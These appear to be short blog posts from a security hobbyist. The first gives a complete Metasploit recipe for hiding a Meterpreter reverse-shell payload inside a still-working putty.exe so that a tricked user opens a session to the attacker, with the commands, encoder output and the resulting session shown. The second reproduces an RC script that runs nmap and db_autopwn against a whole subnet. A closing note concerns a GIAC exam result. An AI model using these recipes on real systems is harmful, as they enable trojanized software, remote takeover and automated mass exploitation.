wait for it…………..

For a while now it has been possible to add msfencoded payloads into executable. However the resulting files would not work as expected. ie You could trick a user into running a file which would in turn give you a meterpreter session but the user would soon find that something was amiss with the exe……not any more.

http://www.metasploit.com/redmine/projects/framework/repository/revisions/8896

./msfencode -h

Usage: ./msfencode
OPTIONS:
-a The architecture to encode as
-b The list of characters to avoid: ‘\x00\xff’
-c The number of times to encode the data
-e The encoder to use
-h Help banner
-i Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m Specifies an additional module search path
-n Dump encoder information
-o The output file
-p The platform to encode for
-s The maximum size of the encoded data
-t The format to display the encoded buffer with (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war)
-x Specify an alternate win32 executable template

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.199.129 LPORT=31337 R | ./msfencode -x putty.exe -t exe -k -o putty_backdoored.exe -e x86/shikata_ga_nai -c 10

[*] x86/shikata_ga_nai succeeded with size 315 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 342 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 369 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 396 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 423 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 450 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 477 (iteration=7)
[*] x86/shikata_ga_nai succeeded with size 504 (iteration=8)
[*] x86/shikata_ga_nai succeeded with size 531 (iteration=9)
[*] x86/shikata_ga_nai succeeded with size 558 (iteration=10

file putty_backdoored.exe
putty_backdoored.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.199.129
LHOST => 192.168.199.129
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.199.129:31337
[*] Starting the payload handler…
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.199.129:31337 -> 192.168.199.130:50766)

You’ll still need to migrate or your shell will terminate when the backdoored process is killed

I just saw this on seclists.org.

HD Moore posted this to kick off db_autopwn via msfconsole RC script

$ vim ownitall.rc
db_create /tmp/mynet.db
db_nmap -sS -F -n 192.168.0.0/24 -T5
setg AutoRunScript scraper
db_autopwn -t -e -p -r

$ msfconsole -r ownitall.rc

So I passed with an 88………..kind of disappointed I didn’t do better, ridiculous mistakes, oh well. I had two questions that were flat out wrong and I contacted the GIAC. Enough about that, now I just need to come up with a topic for my Gold paper. Any suggestions……………